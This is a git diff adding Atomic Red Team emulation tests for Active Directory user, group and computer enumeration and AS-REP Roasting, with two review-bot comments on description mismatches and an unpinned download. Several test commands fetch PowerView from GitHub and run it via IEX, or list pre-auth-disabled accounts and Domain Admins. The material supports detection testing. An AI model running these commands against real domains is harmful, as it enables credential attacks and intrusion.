diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 0a6f7538..4e598d60 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
@@ -781,6 +782,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -789,6 +791,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -857,6 +862,7 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 25300732..2a0ede05 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,5 +1,6 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -524,6 +525,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -532,6 +534,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -573,6 +578,7 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 253ca895..0c8c1184 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -8,6 +8,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
+ - Atomic Test #2: Get-DomainUser with PowerView [windows]
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1282,6 +1283,7 @@
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+ - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1291,6 +1293,9 @@
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+ - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
+ - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+ - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1374,6 +1379,7 @@
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+ - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 5a6fc548..9aca2c0d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -3,6 +3,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
+ - Atomic Test #2: Get-DomainUser with PowerView [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
@@ -906,6 +907,7 @@
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+ - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -915,6 +917,9 @@
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+ - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
+ - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+ - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -971,6 +976,7 @@
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+ - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 66dce2ee..32ccfe39 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -341,6 +341,20 @@ credential-access:
'
name: powershell
elevation_required: false
+ - name: Get-DomainUser with PowerView
+ auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
+ description: 'Utilizing PowerView, run Get-DomainUser to identify domain users.
+ Upon execution, progress and info about users within the domain being scanned
+ will be displayed.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+ name: powershell
T1552.003:
technique:
external_references:
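Review bot: The description of the new `Get-DomainUser with PowerView` entry says the test identifies domain users, but the command passes `-PreauthNotRequired`, which (going by the flag name and the AS-REP Roasting technique the entry is filed under) narrows the result to accounts with Kerberos pre-authentication disabled. Anyone mapping this GUID to detection coverage from the description alone would misread what telemetry it produces. Suggested wording: `Utilizing PowerView, run Get-DomainUser -PreauthNotRequired to list domain accounts that do not require Kerberos pre-authentication.` The executor block also omits `elevation_required: false`, which the entry directly above it sets. The same description is repeated in the T1558.004.md hunk.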
@@ -55087,6 +55101,18 @@ discovery:
-Server #{domain}
'
+ - name: Enumerate Active Directory Users with ADSISearcher
+ auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+ Upon successful execution a listing of users will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
T1069.002:
technique:
external_references:
@@ -55280,6 +55306,71 @@ discovery:
executor:
command: "#{adfind_path} -f (objectcategory=group)\n"
name: command_prompt
+ - name: Enumerate Active Directory Groups with ADSISearcher
+ auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+ Upon successful execution a listing of groups will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+
+'
+ - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+ auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+ description: |
+ When successful, accounts that do not require kerberos pre-auth will be returned.
+ Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Computer must be domain joined.
+
+'
+ prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+ {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host Joining this computer to a domain must be
+ done manually.
+
+'
+ - description: 'Requires the Active Directory module for powershell to be installed.
+
+'
+ prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
+ 0} else {exit 1}
+
+'
+ get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+
+'
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties
+ useraccountcontrol | Format-Table name
+
+'
+ - name: Get-DomainGroupMember with PowerView
+ auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
+ description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain
+ users. Upon execution, progress and info about groups within the domain being
+ scanned will be displayed.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+ name: powershell
T1482:
technique:
external_references:
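Review bot: The `Get-DomainGroupMember with PowerView` entry downloads PowerView.ps1 from the `master` branch and passes it to `IEX`, so the code the test executes can change whenever that branch changes. The `Get-DomainUser with PowerView` entry added in this same commit pins the download to commit `f94a5d298a1b4c5dfb1f30a246d9c73d13b22888`. Use the same pinned path here, `.../PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1`, so that runs are reproducible and the executed script is a reviewed revision. The description also says the test identifies "domain users" and reports on "groups", while the command lists the members of `"Domain Admins"`; something like `run Get-DomainGroupMember to list the members of the Domain Admins group` would match it. The same command and description appear in the T1069.002.md hunk, and if this index is generated from the technique's YAML, the fix belongs in that source file, which this diff does not show.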
@@ -57521,6 +57612,18 @@ discovery:
Write-Host $Computer}
name: powershell
elevation_required: false
+ - name: Enumerate Active Directory Computers with ADSISearcher
+ auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+ Upon successful execution a listing of computers will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
T1518.001:
technique:
id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index cb53f87d..3055bdc6 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -36,6 +36,8 @@ Specific to macOS, the bonjour protocol exists to discover addition
- [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
+- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher)
+
@@ -634,4 +636,34 @@ write-host "This PC must be manually added to a domain."
+
+
+
+## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+Upon successful execution a listing of computers will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+```
+
+
+
+
+
+
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 478cf7a8..999930da 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -22,6 +22,12 @@ Commands such as net group /domain of the [Net](https://attack.mitr
- [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
+- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher)
+
+- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview)
+
@@ -308,4 +314,113 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
+
+
+
+## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+When successful, accounts that do not require kerberos pre-auth will be returned.
+Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must be domain joined.
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually.
+```
+##### Description: Requires the Active Directory module for powershell to be installed.
+##### Check Prereq Commands:
+```powershell
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+```
+
+
+
+
+
+
+
+## Atomic Test #11 - Get-DomainGroupMember with PowerView
+Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+```
+
+
+
+
+
+
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 254f6d75..55e4e2bd 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -26,6 +26,8 @@ Commands such as net user /domain and net group /domain
@@ -441,4 +443,34 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+
+
+
+## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+Upon successful execution a listing of users will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 02e8be5a-3065-4e54-8cc8-a14d138834d3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
+```
+
+
+
+
+
+
diff --git a/atomics/T1558.004/T1558.004.md b/atomics/T1558.004/T1558.004.md
index 9d552e79..a294efbc 100644
--- a/atomics/T1558.004/T1558.004.md
+++ b/atomics/T1558.004/T1558.004.md
@@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
- [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast)
+- [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview)
+
@@ -76,4 +78,33 @@ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable
+
+
+
+## Atomic Test #2 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d6139549-7b72-4e48-9ea1-324fc9bdf88a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+```
+
+
+
+
+
+